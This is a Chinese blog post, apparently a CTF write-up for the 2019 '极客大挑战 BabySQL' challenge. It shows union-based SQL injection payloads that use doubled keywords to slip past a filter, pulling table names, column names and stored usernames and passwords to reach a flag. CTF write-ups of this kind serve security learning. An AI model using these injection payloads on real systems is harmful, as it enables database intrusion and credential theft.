[极客大挑战 2019]BabySQL

于 2022-02-12 17:39:19 发布
阅读量1.6k 收藏 1
点赞数 1
分类专栏: 题目wp 文章标签: mysql sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62092622/article/details/122899398
版权

打开题目

发现上面写自从前几次网站被日,我对我的网站做了严格的过滤,你们这些黑客死心吧!!!

所以我们看一下是怎么过滤的吧!输入select

看来是把一些关键词过滤成了空格,可以使用经典的双写绕过

经检查,发现select,from,where,union

查询表列数、显示位、版本、用户什么的就省略了,

查询表名1' uunionnion sselectelect 1,2,group_concat(table_name) frfromom information_schema.tables wwherehere table_schema=database()#

结果显示Table 'infmation_schema.tables' doesn't exist

原来or也被过滤了,修改为1' uunionnion sselectelect 1,2,group_concat(table_name) frfromom infoorrmation_schema.tables wwherehere table_schema=database()#

 目测flag在b4bsql

同理,查询列名1' uunionnion seselectlect 1,2,group_concat(column_name) frofromm infoorrmation_schema.columns wwherehere table_name='b4bsql'#

 我们查询一下username和password1' uunionnion seselectlect 1,group_concat(username),group_concat(passwoorrd) frfromom b4bsql#

注意password需要写成passwoorrd

拿到flag: flag{e98048b1-6880-42d7-bdde-3bad3153e0f3}

-眼里有星河-
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容了深入的分析。
极客挑战2019babysql
kindyyy的博客
04-08 1153
我也是参考了大佬的wp才会的题目..... 大佬博客:[极客挑战 2019]BabySQL - 云千 - 博客园 (对我自己来说)要一步一步的从查库,查表,查列,查字段慢慢来,从这道题我们还要注意有些命令是会被注释的,可以用双写绕过。 大概就是这样。先看题目吧: ...
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
2019年三诺集团四周年庆典极客摇滚跑活动方案
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
最新发布
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
python极客项目编程pdf
03-31
python极客项目编程书籍,很好的一本深入学习python的书籍
极客web前端
07-22
教程名称:极客web前端教程目录:【】1、走进前端工程师的世界【】2、HTML5【】3、CSS3【】4、Javascript【】5、常?的库之 jQuery【】6、常?...资源太大,传百度网盘了,链接在附件中,有需要的同学自取。
GFG-:极客极客30天挑战
02-17
极客30天挑战2021年1月 30天练​​习问题的Python解决方案: 与同学一起翻阅怪胎。(Array); 第N个自然数; 不能表示为Sum的最小正整数; 从抽屉里拿出“ k”双袜子的最小采摘次数; 螺旋矩阵奇克兰的硬币; 有效...
Web3极客报 #12
01-08
如何构建一个Dapp – 教程实例@Riverhttps://www.dappuniversity.com/articles/how-to-build-a-blockchain-app 基于Web3,Solidity,Truffle的一个完整的售卖和购买的简单Dapp demo。 ...基于Web3,Solidity,Truffle等...
Python极客项目编程
06-08
在本书中,你会看到14个令人兴奋的项目,旨在鼓励你探索Python编程的世界。这些项目涉及广泛的主题,如绘制类似万花尺的花纹、生成ASCII码艺术图、3D渲染,以及根据音乐同步投射激光图像。除了本身很有趣之外,这些...
极客学院前端最新教学视频
10-25
极客学院最新前端教学视频及源码,html5+css+js.极客学院最新前端教学视频及源码,html5+css+js.
极客挑战 2019]BabySQL
Keepb1ue的博客
12-03 6144
地址:[极客挑战 2019]BabySQL 一个登陆框,尝试admin/admin登陆 GET方式传参,测试注入 测试存在过滤 简单Fuzz一下 测试请求过快,出现429的情况,可以配置下延时爆破 出现Input your username and password都是被过滤的字符 知道被过滤的字符就好办了,使用双写绕过即可。 http://439fc8e9-c9d1-4fb5-858a-39b86d471f8c.node4.buuoj.cn:81/check.php?username=
[极客挑战 2019]babysql
03-16
"极客挑战 2019" 的 "babysql" 是一道 SQL 注入漏洞题目。题目要求通过提交带有恶意代码的 SQL 查询,绕过网站的验证机制并获取敏感信息。解决这道题目的关键在于对 SQL 注入的理解和利用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值